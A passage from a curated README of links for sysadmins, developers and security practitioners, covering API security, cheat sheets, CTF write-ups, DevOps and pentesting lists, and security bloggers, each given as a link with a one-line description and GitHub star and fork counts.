href="https://github.com/shieldfy/API-Security-Checklist"><b>API-Security-Checklist</b></a></a> - security countermeasures when designing, testing, and releasing your API.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://enable-cors.org/index.html">🌎 <b>Enable CORS</b></a> - enable cross-origin resource sharing.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://appsecwiki.com/#/">🌎 <b>Application Security Wiki</b></a> - is an initiative to provide all application security related resources at one place.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;?⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;?🍴</code></b> <a href="https://github.com/GrrrDog/weird_proxies/wiki"><b>Weird Proxies</b></a></a> - reverse proxy related attacks; it is a result of analysis of various proxies.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://dfir.it/blog/2015/08/12/webshell-every-time-the-same-purpose/">🌎 <b>Webshells</b></a> - great series about malicious payloads.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://portswigger.net/blog/practical-web-cache-poisoning">🌎 <b>Practical Web Cache Poisoning</b></a> - show you how to compromise websites by using esoteric web features.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;167⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;54🍴</code></b> <a href="https://github.com/bl4de/research/tree/master/hidden_directories_leaks"><b>Hidden directories and files</b></a></a> - as a source of sensitive information about web application.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://bo0om.ru/en/">🌎 <b>Explosive blog</b></a> - great blog about cybersec and pentests.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.netsparker.com/security-cookies-whitepaper/">🌎 <b>Security Cookies</b></a> - this paper will take a close look at cookie security.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;1873⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;91🍴</code></b> <a href="https://github.com/GitGuardian/APISecurityBestPractices"><b>APISecurityBestPractices</b></a></a> - help you keep secrets (API keys, db credentials, certificates) out of source code.<br> </p> ##### :black_small_square: All-in-one <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://lzone.de/cheat-sheet/">🌎 <b>LZone Cheat Sheets</b></a> - all cheat sheets.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;13085⭐</code></b> <b><code>&nbsp;&nbsp;3533🍴</code></b> <a href="https://github.com/rstacruz/cheatsheets"><b>Dan’s Cheat Sheets’s</b></a></a> - massive cheat sheets documentation.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://devhints.io/">🌎 <b>Rico's cheatsheets</b></a> - this is a modest collection of cheatsheets.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://devdocs.io/">🌎 <b>DevDocs API</b></a> - combines multiple API documentations in a fast, organized, and searchable interface.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cheat.sh/">🌎 <b>cheat.sh</b></a> - the only cheat sheet you need.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gnulinux.guru/">🌎 <b>gnulinux.guru</b></a> - collection of cheat sheets about bash, vim and networking.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://andreasbm.github.io/web-skills/">🌎 <b>Web Skills</b></a> - visual overview of useful skills to learn as a web developer.<br> </p> ##### :black_small_square: Ebooks <p> &nbsp;&nbsp;:small_orange_diamond: <b><code>295787⭐</code></b> <b><code>&nbsp;56901🍴</code></b> <a href="https://github.com/EbookFoundation/free-programming-books"><b>free-programming-books</b></a></a> - list of free learning resources in many languages.<br> </p> ##### :black_small_square: Other <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://bitvijays.github.io/LFC-VulnerableMachines.html">🌎 <b>CTF Series : Vulnerable Machines</b></a> - the steps below could be followed to find vulnerabilities and exploits.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;578⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;67🍴</code></b> <a href="https://github.com/manoelt/50M_CTF_Writeup"><b>50M_CTF_Writeup</b></a></a> - $50 million CTF from Hackerone - writeup.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;586⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;63🍴</code></b> <a href="https://github.com/j00ru/ctf-tasks"><b>ctf-tasks</b></a></a> - an archive of low-level CTF challenges developed over the years.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://hshrzd.wordpress.com/how-to-start/">🌎 <b>How to start RE/malware analysis?</b></a> - collection of some hints and useful links for the beginners.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.kegel.com/c10k.html"><b>The C10K problem</b></a> - it's time for web servers to handle ten thousand clients simultaneously, don't you think?<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://blog.benjojo.co.uk/post/why-is-ethernet-mtu-1500">🌎 <b>How 1500 bytes became the MTU of the internet</b></a> - great story about the Maximum Transmission Unit.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://poormansprofiler.org/"><b>poor man's profiler</b></a> - like dtrace's don't really provide methods to see what programs are blocking on.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://nickcraver.com/blog/2017/05/22/https-on-stack-overflow/">🌎 <b>HTTPS on Stack Overflow</b></a> - this is the story of a long journey regarding the implementation of SSL.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://drawings.jvns.ca/">🌎 <b>Julia's Drawings</b></a> - some drawings about programming and unix world, zines about systems & debugging tools.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;2557⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;166🍴</code></b> <a href="https://github.com/corkami/collisions"><b>Hash collisions</b></a></a> - this great repository is focused on hash collisions exploitation.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;3286⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;163🍴</code></b> <a href="https://github.com/in3rsha/sha256-animation"><b>sha256-animation</b></a></a> - animation of the SHA-256 hash function in your terminal.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://sha256algorithm.com/">🌎 <b>sha256algorithm</b></a> - sha256 algorithm explained online step by step visually.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://labs.ripe.net/Members/cteusche/bgp-meets-cat">🌎 <b>BGP Meets Cat</b></a> - after 3072 hours of manipulating BGP, Job Snijders has succeeded in drawing a Nyancat.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;404⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;17🍴</code></b> <a href="https://github.com/benjojo/bgp-battleships"><b>bgp-battleships</b></a></a> - playing battleships over BGP.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;37095⭐</code></b> <b><code>&nbsp;&nbsp;3720🍴</code></b> <a href="https://github.com/alex/what-happens-when"><b>What happens when...</b></a></a> - you type google.com into your browser and press enter?<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;14798⭐</code></b> <b><code>&nbsp;&nbsp;1607🍴</code></b> <a href="https://github.com/vasanthk/how-web-works"><b>how-web-works</b></a></a> - based on the 'What happens when...' repository.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://robertheaton.com/2018/11/28/https-in-the-real-world/">🌎 <b>HTTPS in the real world</b></a> - great tutorial explain how HTTPS works in the real world.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://about.gitlab.com/2018/11/14/how-we-spent-two-weeks-hunting-an-nfs-bug/">🌎 <b>Gitlab and NFS bug</b></a> - how we spent two weeks hunting an NFS bug in the Linux kernel.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://about.gitlab.com/2017/02/10/postmortem-of-database-outage-of-january-31/">🌎 <b>Gitlab melts down</b></a> - postmortem on the database outage of January 31 2017 with the lessons we learned.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.catb.org/esr/faqs/hacker-howto.html"><b>How To Become A Hacker</b></a> - if you want to be a hacker, keep reading.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://ithare.com/infographics-operation-costs-in-cpu-clock-cycles/"><b>Operation Costs in CPU</b></a> - should help to estimate costs of certain operations in CPU clocks.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cstack.github.io/db_tutorial/">🌎 <b>Let's Build a Simple Database</b></a> - writing a sqlite clone from scratch in C.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://djhworld.github.io/post/2019/05/21/i-dont-know-how-cpus-work-so-i-simulated-one-in-code/">🌎 <b>simple-computer</b></a> - great resource to understand how computers work under the hood.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.troyhunt.com/working-with-154-million-records-on/">🌎 <b>The story of "Have I been pwned?"</b></a> - working with 154 million records on Azure Table Storage.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.top500.org/">🌎 <b>TOP500 Supercomputers</b></a> - shows the 500 most powerful commercially available computer systems known to us.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.shellntel.com/blog/2017/2/8/how-to-build-a-8-gpu-password-cracker">🌎 <b>How to build a 8 GPU password cracker</b></a> - any "black magic" or hours of frustration like desktop components do.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://home.cern/science/computing">🌎 <b>CERN Data Centre</b></a> - 3D visualizations of the CERN computing environments (and more).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://howfuckedismydatabase.com/"><b>How fucked is my database</b></a> - evaluate how fucked your database is with this handy website.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://krisbuytaert.be/blog/linux-troubleshooting-101-2016-edition/index.html">🌎 <b>Linux Troubleshooting 101 , 2016 Edition</b></a> - everything is a DNS Problem...<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://open.buffer.com/5-whys-process/">🌎 <b>Five Whys</b></a> - you know what the problem is, but you cannot solve it?<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gvnshtn.com/maersk-me-notpetya/">🌎 <b>Maersk, me & notPetya</b></a> - how did ransomware successfully hijack hundreds of domain controllers?<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://howhttps.works/">🌎 <b>howhttps.works</b></a> - how HTTPS works ...in a comic!<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://howdns.works/">🌎 <b>howdns.works</b></a> - a fun and colorful explanation of how DNS works.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://postgresqlco.nf/en/doc/param/">🌎 <b>POSTGRESQLCO.NF</b></a> - your postgresql.conf documentation and recommendations.<br> </p> #### Inspiring Lists &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### :black_small_square: SysOps/DevOps <p> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;23122⭐</code></b> <b><code>&nbsp;&nbsp;2884🍴</code></b> <a href="https://github.com/kahun/awesome-sysadmin"><b>Awesome Sysadmin</b></a></a> - amazingly awesome open source sysadmin resources.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;28209⭐</code></b> <b><code>&nbsp;&nbsp;2304🍴</code></b> <a href="https://github.com/alebcay/awesome-shell"><b>Awesome Shell</b></a></a> - awesome command-line frameworks, toolkits, guides and gizmos.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;10098⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;727🍴</code></b> <a href="https://github.com/learnbyexample/Command-line-text-processing"><b>Command-line-text-processing</b></a></a> - finding text to search and replace, sorting to beautifying, and more.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;2797⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;450🍴</code></b> <a href="https://github.com/caesar0301/awesome-pcaptools"><b>Awesome Pcaptools</b></a></a> - collection of tools developed by other researchers to process network traces.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;3316⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;304🍴</code></b> <a href="https://github.com/zoidbergwill/awesome-ebpf"><b>awesome-ebpf</b></a></a> - a curated list of awesome projects related to eBPF.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;3471⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;405🍴</code></b> <a href="https://github.com/leandromoreira/linux-network-performance-parameters"><b>Linux Network Performance</b></a></a> - where some of the network sysctl variables fit into the Linux/Kernel network flow.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;8933⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;764🍴</code></b> <a href="https://github.com/dhamaniasad/awesome-postgres"><b>Awesome Postgres</b></a></a> - list of awesome PostgreSQL software, libraries, tools and resources.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;4338⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;657🍴</code></b> <a href="https://github.com/enochtangg/quick-SQL-cheatsheet"><b>quick-SQL-cheatsheet</b></a></a> - a quick reminder of all SQL queries and examples on how to use them.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>143423⭐</code></b> <b><code>&nbsp;&nbsp;8054🍴</code></b> <a href="https://github.com/Kickball/awesome-selfhosted"><b>Awesome-Selfhosted</b></a></a> - list of Free Software network services and web applications which can be hosted locally.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://wiki.archlinux.org/index.php/List_of_applications">🌎 <b>List of applications</b></a> - huge list of apps sorted by category, as a reference for those looking for packages.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;18176⭐</code></b> <b><code>&nbsp;&nbsp;2617🍴</code></b> <a href="https://github.com/InterviewMap/CS-Interview-Knowledge-Map"><b>CS-Interview-Knowledge-Map</b></a></a> - build the best interview map.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;6988⭐</code></b> <b><code>&nbsp;&nbsp;1334🍴</code></b> <a href="https://github.com/Tikam02/DevOps-Guide"><b>DevOps-Guide</b></a></a> - DevOps Guide from basic to advanced with Interview Questions and Notes.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://issue.freebsdfoundation.org/publication/?m=33057&l=1&view=issuelistBrowser">🌎 <b>FreeBSD Journal</b></a> - it is a great list of periodical magazines about FreeBSD and other important things.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;56069⭐</code></b> <b><code>&nbsp;11738🍴</code></b> <a href="https://github.com/bregman-arie/devops-interview-questions"><b>devops-interview-questions</b></a></a> - contains interview questions on various DevOps and SRE related topics.<br></p> ##### :black_small_square: Developers <p> &nbsp;&nbsp;:small_orange_diamond: <b><code>247082⭐</code></b> <b><code>&nbsp;34586🍴</code></b> <a href="https://github.com/kamranahmedse/developer-roadmap"><b>Web Developer Roadmap</b></a></a> - roadmaps, articles and resources to help you choose your path, learn and improve.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;65860⭐</code></b> <b><code>&nbsp;&nbsp;6344🍴</code></b> <a href="https://github.com/thedaviddias/Front-End-Checklist"><b>Front-End-Checklist</b></a></a> - the perfect Front-End Checklist for modern websites and meticulous developers.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;15953⭐</code></b> <b><code>&nbsp;&nbsp;1170🍴</code></b> <a href="https://github.com/thedaviddias/Front-End-Performance-Checklist"><b>Front-End-Performance-Checklist</b></a></a> - Front-End Performance Checklist that runs faster than the others.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://rszalski.github.io/magicmethods/">🌎 <b>Python's Magic Methods</b></a> - what are magic methods? They're everything in object-oriented Python.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;32985⭐</code></b> <b><code>&nbsp;&nbsp;2584🍴</code></b> <a href="https://github.com/satwikkansal/wtfpython"><b>wtfpython</b></a></a> - a collection of surprising Python snippets and lesser-known features.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;3954⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;268🍴</code></b> <a href="https://github.com/twhite96/js-dev-reads"><b>js-dev-reads</b></a></a> - a list of books and articles for the discerning web developer to read.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;6603⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;345🍴</code></b> <a href="https://github.com/RomuloOliveira/commit-messages-guide"><b>Commit messages guide</b></a></a> - a guide to understand the importance of commit messages.<br> </p> ##### :black_small_square: Security/Pentesting <p> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;9958⭐</code></b> <b><code>&nbsp;&nbsp;1596🍴</code></b> <a href="https://github.com/qazbnm456/awesome-web-security"><b>Awesome Web Security</b></a></a> - a curated list of Web Security materials and resources.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;2812⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;442🍴</code></b> <a href="https://github.com/joe-shenouda/awesome-cyber-skills"><b>awesome-cyber-skills</b></a></a> - a curated list of hacking environments where you can train your cyber skills.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;3976⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;874🍴</code></b> <a href="https://github.com/devsecops/awesome-devsecops"><b>awesome-devsecops</b></a></a> - an authoritative list of awesome devsecops tools.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;13581⭐</code></b> <b><code>&nbsp;&nbsp;2357🍴</code></b> <a href="https://github.com/jivoi/awesome-osint"><b>awesome-osint</b></a></a> - is a curated list of amazingly awesome OSINT.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;1622⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;281🍴</code></b> <a href="https://github.com/HolyBugx/HolyTips"><b>HolyTips</b></a></a> - tips and tutorials on Bug Bounty Hunting and Web App Security.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;6401⭐</code></b> <b><code>&nbsp;&nbsp;1327🍴</code></b> <a href="https://github.com/hslatman/awesome-threat-intelligence"><b>awesome-threat-intelligence</b></a></a> - a curated list of Awesome Threat Intelligence resources.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;7826⭐</code></b> <b><code>&nbsp;&nbsp;2043🍴</code></b> <a href="https://github.com/infosecn1nja/Red-Teaming-Toolkit"><b>Red-Teaming-Toolkit</b></a></a> - a collection of open source and commercial tools that aid in red team operations.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;2542⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;554🍴</code></b> <a href="https://github.com/snoopysecurity/awesome-burp-extensions"><b>awesome-burp-extensions</b></a></a> - a curated list of amazingly awesome Burp Extensions.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;3866⭐</code></b> <b><code>&nbsp;&nbsp;1041🍴</code></b> <a href="https://github.com/Hack-with-Github/Free-Security-eBooks"><b>Free Security eBooks</b></a></a> - list of a Free Security and Hacking eBooks.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;4285⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;980🍴</code></b> <a href="https://github.com/yeahhub/Hacking-Security-Ebooks"><b>Hacking-Security-Ebooks</b></a></a> - top 100 Hacking & Security E-Books.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;1869⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;102🍴</code></b> <a href="https://github.com/nikitavoloboev/privacy-respecting"><b>privacy-respecting</b></a></a> - curated list of privacy respecting services and software.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;7843⭐</code></b> <b><code>&nbsp;&nbsp;1008🍴</code></b> <a href="https://github.com/wtsxDev/reverse-engineering"><b>reverse-engineering</b></a></a> - list of awesome reverse engineering resources.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;1838⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;367🍴</code></b> <a href="https://github.com/michalmalik/linux-re-101"><b>linux-re-101</b></a></a> - a collection of resources for linux reverse engineering.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;1972⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;312🍴</code></b> <a href="https://github.com/onethawt/reverseengineering-reading-list"><b>reverseengineering-reading-list</b></a></a> - a list of Reverse Engineering articles, books, and papers.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;5383⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;980🍴</code></b> <a href="https://github.com/0xInfection/Awesome-WAF"><b>Awesome-WAF</b></a></a> - a curated list of awesome web-app firewall (WAF) stuff.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;4364⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;724🍴</code></b> <a href="https://github.com/jakejarvis/awesome-shodan-queries"><b>awesome-shodan-queries</b></a></a> - interesting, funny, and depressing search queries to plug into shodan.io.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;1293⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;307🍴</code></b> <a href="https://github.com/danielmiessler/RobotsDisallowed"><b>RobotsDisallowed</b></a></a> - a curated list of the most common and most interesting robots.txt disallowed directories.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;2474⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;302🍴</code></b> <a href="https://github.com/Kayzaks/HackingNeuralNetworks"><b>HackingNeuralNetworks</b></a></a> - is a small course on exploiting and defending neural networks.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gist.github.com/joepie91/7e5cad8c0726fd6a5e90360a754fc568">🌎 <b>wildcard-certificates</b></a> - why you probably shouldn't use a wildcard certificate.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gist.github.com/joepie91/5a9909939e6ce7d09e29">🌎 <b>Don't use VPN services</b></a> - which is what every third-party "VPN provider" does.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;2841⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;440🍴</code></b> <a href="https://github.com/InQuest/awesome-yara"><b>awesome-yara</b></a></a> - a curated list of awesome YARA rules, tools, and people.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;20360⭐</code></b> <b><code>&nbsp;&nbsp;1428🍴</code></b> <a href="https://github.com/drduh/macOS-Security-and-Privacy-Guide"><b>macOS-Security-and-Privacy-Guide</b></a></a> - guide to securing and improving privacy on macOS.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;1274⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;159🍴</code></b> <a href="https://github.com/usnistgov/macos_security"><b>macos_security</b></a></a> - macOS Security Compliance Project.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;3835⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;488🍴</code></b> <a href="https://github.com/PaulSec/awesome-sec-talks"><b>awesome-sec-talks</b></a></a> - is a collected list of awesome security talks.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;9778⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;889🍴</code></b> <a href="https://github.com/k4m4/movies-for-hackers"><b>Movies for Hackers</b></a></a> - list of movies every hacker & cyberpunk must watch.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;&nbsp;19⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;6🍴</code></b> <a href="https://github.com/danieldizzy/Cryptography_1"><b>Cryptography_1</b></a></a> - materials used whilst taking Prof. Dan Boneh Stanford Crypto course.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;1306⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;260🍴</code></b> <a href="https://github.com/ashutosh1206/Crypton"><b>Crypton</b></a></a> - library to learn and practice Offensive and Defensive Cryptography.<br> </p> ##### :black_small_square: Other <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.cheatography.com/">🌎 <b>Cheatography</b></a> - over 3,000 free cheat sheets, revision aids and quick references.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;11561⭐</code></b> <b><code>&nbsp;&nbsp;1272🍴</code></b> <a href="https://github.com/mre/awesome-static-analysis"><b>awesome-static-analysis</b></a></a> - static analysis tools for all programming languages.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>147248⭐</code></b> <b><code>&nbsp;18908🍴</code></b> <a href="https://github.com/ossu/computer-science"><b>computer-science</b></a></a> - path to a free self-taught education in Computer Science.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;10288⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;408🍴</code></b> <a href="https://github.com/danluu/post-mortems"><b>post-mortems</b></a></a> - is a collection of postmortems (config errors, hardware failures, and more).<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>212615⭐</code></b> <b><code>&nbsp;20744🍴</code></b> <a href="https://github.com/danistefanovic/build-your-own-x"><b>build-your-own-x</b></a></a> - build your own (insert technology here).<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;?⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;?🍴</code></b> <a href="https://github.com/rby90/Project-Based-Tutorials-in-C"><b>Project-Based-Tutorials-in-C</b></a></a> - is a curated list of project-based tutorials in C.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;5149⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;742🍴</code></b> <a href="https://github.com/kylelobo/The-Documentation-Compendium"><b>The-Documentation-Compendium</b></a></a> - various README templates & tips on writing high-quality documentation.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;14724⭐</code></b> <b><code>&nbsp;&nbsp;2541🍴</code></b> <a href="https://github.com/mahmoud/awesome-python-applications"><b>awesome-python-applications</b></a></a> - free software that works great, and also happens to be open-source Python.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;55473⭐</code></b> <b><code>&nbsp;&nbsp;9455🍴</code></b> <a href="https://github.com/awesomedata/awesome-public-datasets"><b>awesome-public-datasets</b></a></a> - a topic-centric list of HQ open datasets.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;216⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;37🍴</code></b> <a href="https://github.com/Sahith02/machine-learning-algorithms"><b>machine-learning-algorithms</b></a></a> - a curated list of all machine learning algorithms and concepts.<br> </p> #### Blogs/Podcasts/Videos &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### :black_small_square: SysOps/DevOps <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.youtube.com/watch?v=nAFpkV5-vuI">🌎 <b>Varnish for PHP developers</b></a> - very interesting presentation of Varnish by Mattias Geniar.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.youtube.com/watch?v=CZ3wIuvmHeM">🌎 <b>A Netflix Guide to Microservices</b></a> - talks about the chaotic and vibrant world of microservices at Netflix.<br> </p> ##### :black_small_square: Developers <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.youtube.com/watch?v=yOyaJXpAYZQ">🌎 <b>Comparing C to machine lang</b></a> - compare a simple C app with the compiled machine code of that program.<br> </p> ##### :black_small_square: Geeky Persons <p> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.brendangregg.com/"><b>Brendan Gregg's Blog</b></a> - is an industry expert in computing performance and cloud computing.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gynvael.coldwind.pl/">🌎 <b>Gynvael "GynDream" Coldwind</b></a> - is a IT security engineer at Google.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://lcamtuf.coredump.cx/"><b>Michał "lcamtuf" Zalewski</b></a> - white hat hacker, computer security expert.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ma.ttias.be/">🌎 <b>Mattias Geniar</b></a> - developer, sysadmin, blogger, podcaster and public speaker.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://nickcraver.com/">🌎 <b>Nick Craver</b></a> - software developer and systems administrator for Stack Exchange.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://scotthelme.co.uk/">🌎 <b>Scott Helme</b></a> - security researcher, speaker and founder of securityheaders.com and report-uri.com.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://krebsonsecurity.com/">🌎 <b>Brian Krebs</b></a> - The Washington Post and now an Independent investigative journalist.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.schneier.com/">🌎 <b>Bruce Schneier</b></a> - is an internationally renowned security technologist, called a "security guru".<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://chrissymorgan.co.uk/">🌎 <b>Chrissy Morgan</b></a> - advocate of practical learning, Chrissy also takes part in bug bounty programs.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://blog.zsec.uk/">🌎 <b>Andy Gill</b></a> - is a hacker at heart who works as a senior penetration tester.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://danielmiessler.com/">🌎 <b>Daniel 